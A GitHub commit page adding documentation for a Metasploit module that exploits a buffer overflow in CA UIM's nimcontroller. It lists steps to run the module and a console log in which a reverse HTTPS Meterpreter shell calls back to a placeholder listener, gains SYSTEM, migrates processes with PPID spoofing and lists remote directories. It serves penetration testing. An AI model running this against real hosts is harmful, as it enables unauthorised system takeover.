-
Notifications
You must be signed in to change notification settings - Fork 13.8k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Showing
2 changed files
with
593 additions
and
0 deletions.
There are no files selected for viewing
113 changes: 113 additions & 0 deletions
113
documentation/modules/exploit/windows/nimsoft/nimcontroller_bof.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,113 @@ | ||
| ## Vulnerable Application | ||
|
|
||
| All CA Infrastructure Management monitoring agents prior to 9.20 are vulnerable to a buffer overflow vulnerability | ||
| within the nimcontroller when using the directory_list probe. Since the directory_list probe requires read privileges | ||
| the target host must also be vulnerable to CVE-2020-8010 to bypass ACL settings. Successful code execution will result | ||
| in a NT AUTHORITY\SYSTEM shell, even if exploitation fails the remote service will not crash. You should be able to | ||
| exploit the service an unlimited amount of times. | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| 1. Install the CA UIM v7.80.3132 (nimsoftrobotXXX.exe) | ||
| 2. Start `msfconsole` | ||
| 3. Do `use exploit/windows/nimsoft/nimcontroller_bof` | ||
| 4. Do `set RHOSTS <ip>` | ||
| 5. Do `exploit` | ||
| 6. Verify shell is opened and service is still accessible | ||
|
|
||
| ### Links | ||
|
|
||
| [CA UIM](https://techdocs.broadcom.com/content/broadcom/techdocs/us/en/ca-enterprise-software/it-operations-management/unified-infrastructure-management/9-0-2/getting-started/ca-uim-overview.html) | ||
| [Nimsoft Probe Utility](https://techdocs.broadcom.com/content/broadcom/techdocs/us/en/ca-enterprise-software/it-operations-management/unified-infrastructure-management/9-0-2/administering/run-probe-commands-from-a-command-prompt.html) | ||
|
|
||
| ## Options | ||
|
|
||
| ## Scenarios | ||
|
|
||
| ### Windows 10 x64 | ||
|
|
||
| ``` | ||
| msf5 exploit(windows/nimsoft/nimcontroller_bof) > options | ||
| Module options (exploit/windows/nimsoft/nimcontroller_bof): | ||
| Name Current Setting Required Description | ||
| ---- --------------- -------- ----------- | ||
| DIRECTORY C:\ no Directory path to obtain a listing | ||
| RHOSTS W.X.Y.Z yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' | ||
| RPORT 48000 yes The target port (TCP) | ||
| Payload options (windows/x64/meterpreter/reverse_https): | ||
| Name Current Setting Required Description | ||
| ---- --------------- -------- ----------- | ||
| EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) | ||
| LHOST A.B.C.D yes The local listener hostname | ||
| LPORT 8443 yes The local listener port | ||
| LURI no The HTTP Path | ||
| Exploit target: | ||
| Id Name | ||
| -- ---- | ||
| 0 Windows Universal (x64) - v7.80.3132 | ||
| msf5 exploit(windows/nimsoft/nimcontroller_bof) > exploit | ||
| [*] Started HTTPS reverse handler on https://A.B.C.D:8443 | ||
| [*] W.X.Y.Z:48000 - Executing automatic check (disable AutoCheck to override) | ||
| [*] https://A.B.C.D:8443 handling request from W.X.Y.Z; (UUID: rpsri4cm) Attaching orphaned/stageless session... | ||
| [*] Meterpreter session 1 opened (A.B.C.D:8443 -> W.X.Y.Z:50980) at 2020-07-21 11:14:09 -0500 | ||
| [*] W.X.Y.Z:48000 - Version 7.80 [Build 7.80.3132, Jun 1 2015] detected, sending directory_list probe | ||
| Directory of C:\ | ||
| 12/15/2019 06:24 PM <DIR> $GetCurrent | ||
| 12/14/2019 01:41 AM <DIR> $Recycle.Bin | ||
| 10/18/2019 05:55 PM <DIR> Documents and Settings | ||
| 07/21/2020 10:15 AM <DIR> pagefile.sys | ||
| 07/14/2020 03:41 PM <DIR> PerfLogs | ||
| 06/10/2020 09:18 AM <DIR> Program Files | ||
| 07/19/2020 01:37 PM <DIR> Program Files (x86) | ||
| 07/14/2020 03:41 PM <DIR> ProgramData | ||
| 12/15/2019 07:08 PM <DIR> Recovery | ||
| 07/21/2020 10:15 AM <DIR> swapfile.sys | ||
| 10/18/2019 04:04 PM <DIR> System Volume Information | ||
| 12/15/2019 07:09 PM <DIR> Users | ||
| 07/18/2020 02:20 PM <DIR> Windows | ||
| [+] W.X.Y.Z:48000 - The target is vulnerable. | ||
| meterpreter > | ||
| [*] Session ID 1 (A.B.C.D:8443 -> W.X.Y.Z:50980) processing AutoRunScript 'post/windows/manage/migrate' | ||
| [*] Running module against DESKTOP-JICNNRT | ||
| [*] Current server process: notepad.exe (1860) | ||
| [*] Spawning notepad.exe process to migrate into | ||
| [*] Spoofing PPID 0 | ||
| [*] Migrating into 7472 | ||
| [+] Successfully migrated into process 7472 | ||
| meterpreter > getuid | ||
| Server username: NT AUTHORITY\SYSTEM | ||
| meterpreter > background | ||
| [*] Backgrounding session 1... | ||
| msf5 exploit(windows/nimsoft/nimcontroller_bof) > set DIRECTORY C:\\Users\\ | ||
| DIRECTORY => C:\Users\ | ||
| msf5 exploit(windows/nimsoft/nimcontroller_bof) > check | ||
| [*] W.X.Y.Z:48000 - Version 7.80 [Build 7.80.3132, Jun 1 2015] detected, sending directory_list probe | ||
| Directory of C:\Users\ | ||
| 03/19/2019 12:02 AM <DIR> All Users | ||
| 12/15/2019 07:14 PM <DIR> Default | ||
| 03/19/2019 12:02 AM <DIR> Default User | ||
| 03/18/2019 11:49 PM <DIR> desktop.ini | ||
| 07/19/2020 01:37 PM <DIR> REDACTED | ||
| 12/15/2019 09:07 PM <DIR> Public | ||
| [+] W.X.Y.Z:48000 - The target is vulnerable. | ||
| ``` |
Oops, something went wrong.